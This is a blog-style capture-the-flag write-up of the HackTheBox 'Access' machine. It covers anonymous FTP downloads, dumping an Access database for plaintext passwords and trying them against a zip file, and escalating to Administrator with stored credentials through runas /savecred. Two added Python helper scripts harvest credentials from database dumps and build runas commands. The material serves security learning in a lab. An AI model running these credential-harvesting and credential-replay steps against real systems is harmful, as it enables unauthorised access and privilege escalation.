Access was an interesting, easy little box. Though a Windows box, it only had a few ports open. The biggest problems here are the open FTP and telnet services: they were the primary points of access, and the channels through which data was exfiltrated and brought back in.
As usual, we start with a typical port scan. Right away, we see that port 80 is open, so browse to it. It only loads a single image:
Taking a look at the page source didn't give much either, and a more detailed nmap service scan on port 80 didn't yield anything useful. I doubt this is an entry point.
Moving on to the other ports, we see that port 23 (telnet) is open. Telnet'ing to that port gets us a login prompt, but we don't have any credentials to try (admin:admin didn't work, and with HTB, brute force is never the answer). So there has to be a hint elsewhere...
Back to the port scan, we see that FTP is open too, and a detailed service scan shows us that anonymous access is allowed!
Connecting to the FTP server and perusing the filesystem shows us 2 files:
Yeah, these are relevant, so download them both. On Kali I can "open" the zip file and see that there's a .pst file inside, but I cannot extract it because the archive is password protected. Again, brute force is never the answer with HTB, so this is either another red herring, or the password is elsewhere.
That leaves the backup.mdb file. It's been so long that I actually forgot that .mdb files are Microsoft Access database files, and had to search it up :S But once I did so, I found a tool on Kali, "mdbtools", which consists of a few different "mdb-*" commands. Eventually, I figured out a couple of commands to dump the entire database to a text file (mdb-tables -1 prints one table name per line, which avoids the empty trailing entry you get when splitting the default space-separated list, and the table name is quoted in case it contains spaces):

mdb-tables -1 backup.mdb > tables.txt
while read -r TABLE; do echo "TABLE: $TABLE"; echo; mdb-export backup.mdb "$TABLE"; echo; echo; done < tables.txt > contents.txt
Looking through the contents in a text viewer, I could easily tell the "empty" tables (header line only) from the ones that actually contained data. That's when I found a really interesting table: "auth_user". Here we have a couple of usernames and plaintext passwords. Sure, admin:admin is in there, and that didn't work on telnet... but there's another, "atypical" username and password.
On a hunch, I try the password on the zip file, and sure enough, the password is being reused here. Now I can extract that .pst file!
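As an added example (not part of the original post), here is a small Python script that does the two steps above programmatically: it parses the contents.txt layout written by the dump loop ("TABLE: name", a blank line, mdb-export's CSV, two blank lines), separates the empty tables from the populated ones, pulls every row out of any table with a password-looking column, and builds the list of passwords worth trying against the zip to test for reuse. The table names and values in SAMPLE_DUMP are constructed for this example; only admin:admin is taken from the post. The column heuristics (PASSWORD_COL, USER_COL) are my own assumptions, not anything mdbtools provides.

```python
import csv
import io
import re
import zipfile

# Constructed sample in the layout the dump loop writes to contents.txt:
# "TABLE: <name>", a blank line, mdb-export's CSV (header only for an empty
# table), then two blank lines.  Table names and values are made up for this
# example; only admin:admin comes from the post.
SAMPLE_DUMP = """TABLE: acc_antiback

"id","name","value"


TABLE: auth_user

"id","username","password","Status","last_login","date_created"
25,"admin","admin",1,"08/23/18 21:11:47","08/23/18 21:11:47"
27,"engineer","example-reused-password",1,"08/23/18 21:13:36","08/23/18 21:13:36"


TABLE: auth_group

"id","name","description"
1,"operators","Day shift"


"""

# Assumed column-name heuristics for spotting credential tables.
PASSWORD_COL = re.compile(r"pass|pwd|secret", re.IGNORECASE)
USER_COL = re.compile(r"user|login", re.IGNORECASE)


def parse_dump(text):
    """Split contents.txt into {table_name: [row dicts]}; empty tables map to []."""
    tables = {}
    for chunk in re.split(r"^TABLE: ", text, flags=re.MULTILINE)[1:]:
        name, _, body = chunk.partition("\n")
        tables[name.strip()] = list(csv.DictReader(io.StringIO(body.strip())))
    return tables


def nonempty_tables(tables):
    """The tables worth reading by hand: those with at least one row."""
    return [name for name, rows in tables.items() if rows]


def find_credentials(tables):
    """Return (table, username, password) for every row of every table that
    has a password-looking column.  The username column is the first column
    matching USER_COL, falling back to the table's first column."""
    hits = []
    for name, rows in tables.items():
        if not rows:
            continue
        cols = list(rows[0].keys())
        pw_cols = [c for c in cols if PASSWORD_COL.search(c)]
        if not pw_cols:
            continue
        user_col = next((c for c in cols if USER_COL.search(c)), cols[0])
        for row in rows:
            for pw_col in pw_cols:
                hits.append((name, row[user_col], row[pw_col]))
    return hits


def candidate_passwords(hits):
    """Unique passwords in first-seen order: the reuse list to try elsewhere."""
    seen = []
    for _, _, password in hits:
        if password and password not in seen:
            seen.append(password)
    return seen


def try_zip_passwords(zip_path, passwords):
    """Try each candidate against a ZipCrypto-protected archive and return the
    first password that decrypts the first member, else None.  The stdlib
    zipfile module cannot read WinZip AES entries (NotImplementedError)."""
    with zipfile.ZipFile(zip_path) as zf:
        member = zf.namelist()[0]
        for password in passwords:
            try:
                zf.read(member, pwd=password.encode())
                return password
            except RuntimeError:
                continue  # "Bad password for file": try the next one
    return None


if __name__ == "__main__":
    tables = parse_dump(SAMPLE_DUMP)
    print("non-empty tables:", nonempty_tables(tables))
    hits = find_credentials(tables)
    for table, user, password in hits:
        print(f"{table}: {user}:{password}")
    print("passwords to try on the zip:", candidate_passwords(hits))
```

Run it against a real contents.txt by replacing SAMPLE_DUMP with open("contents.txt").read(), and feed candidate_passwords() into try_zip_passwords("Access Control.zip", ...) to test the reuse hunch without retyping anything; a handful of passwords lifted from a database is a reuse check, not a brute-force attempt.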
While searching for a way to convert and open a .pst file, I discovered that Evolution, a Linux email client, can import them directly, so I do that. It only imports a single email, but it's all we need. The email seems to be from a team lead of sorts to their minions, reminding them of a recent password change.
Taking these new credentials, I go back to telnet on port 23. And sure enough, the credentials from the email work! And right away, we can get the user flag: C:\Users\security\Desktop\user.txt. Now on to some privilege escalation...
Perusing the filesystem, I stumble across an interesting looking folder:
Running the command searchsploit zkteco suggests that I can exploit this to gain root (admin), but I would have to "change the executable file with a binary of choice". And to be honest, I'm not entirely sure what this means... I mean, I know it's telling me to swap binaries... but which? While trying to figure this out, I came across an article that mentioned checking for stored credentials with cmdkey /list, so I do that as well. Sure enough, there are stored Administrator credentials. Credentials saved in the Windows Credential Manager can be replayed by any process running as the user who saved them, and I know I can do exactly that with runas /savecred, so I run the following:
runas /user:ACCESS\Administrator /savecred "cmd.exe /c type c:\users\administrator\desktop\root.txt > c:\flag.txt"
And BOOM! There's the root flag! DONE!
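As an added example (not code from the original post), the following Python script parses the output format of cmdkey /list, keeps only the entries that runas /savecred can actually replay (a "Domain Password" saved for an interactive logon target), and builds the runas command line used above. The second, Generic entry in SAMPLE_CMDKEY is constructed to show what gets filtered out; the post only states that Administrator credentials were stored, so the exact text of that entry is an assumption based on the usual cmdkey layout.

```python
import re

# Constructed sample of `cmdkey /list` output.  The post only says stored
# Administrator credentials were present; the Generic entry is made up to
# show what must be filtered out.
SAMPLE_CMDKEY = r"""
Currently stored credentials:

    Target: Domain:interactive=ACCESS\Administrator
    Type: Domain Password
    User: ACCESS\Administrator

    Target: LegacyGeneric:target=intranet.example
    Type: Generic
    User: svc_web

"""

# One "Field: value" line of cmdkey output; the value may itself contain colons.
FIELD = re.compile(r"^\s*(Target|Type|User):\s*(.*?)\s*$")


def parse_cmdkey(text):
    """Turn cmdkey /list output into a list of {target, type, user} dicts.
    Entries are separated by blank (or non-field) lines."""
    entries, current = [], {}
    for line in text.splitlines():
        m = FIELD.match(line)
        if m:
            current[m.group(1).lower()] = m.group(2)
        elif current:
            entries.append(current)
            current = {}
    if current:
        entries.append(current)
    return entries


def savecred_users(entries):
    """Users whose stored secret runas /savecred can replay: a Domain Password
    saved for an interactive logon target.  Generic entries (web/app secrets)
    are stored in the same vault but are not usable by runas."""
    return [e["user"] for e in entries
            if e.get("type") == "Domain Password"
            and e.get("target", "").startswith("Domain:interactive=")]


def build_runas(user, command):
    """The runas invocation used above, for a stored-credential user."""
    return 'runas /user:%s /savecred "%s"' % (user, command)


if __name__ == "__main__":
    for user in savecred_users(parse_cmdkey(SAMPLE_CMDKEY)):
        # runas gives no console back, so the command writes its result to a file.
        print(build_runas(user, r"cmd.exe /c whoami > c:\whoami.txt"))
```

The redirect inside the quoted command is the important detail: runas spawns the process in a separate session with no console attached to the telnet shell, so anything you want to read has to be written to a file you can then type out.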
Report for Jerry on HackTheBox.eu (PDF attachment, 2020-08-03, 424.88 KB; download available to registered users only)
For my report, I tried checking out Dradis, but couldn't quite figure out how to get the results I am looking for without wasting an inordinate amount of time on each "engagement" or "project", and since the free Community Edition limits you to a single active project and cannot "template" projects, I set that one aside for now. So I just used CherryTree to enter my notes. This time, I tried to keep them a little "cleaner" and include a bit more detail (including some remediation suggestions) before exporting them to a PDF file, but I will admit, I still have some progress to make there.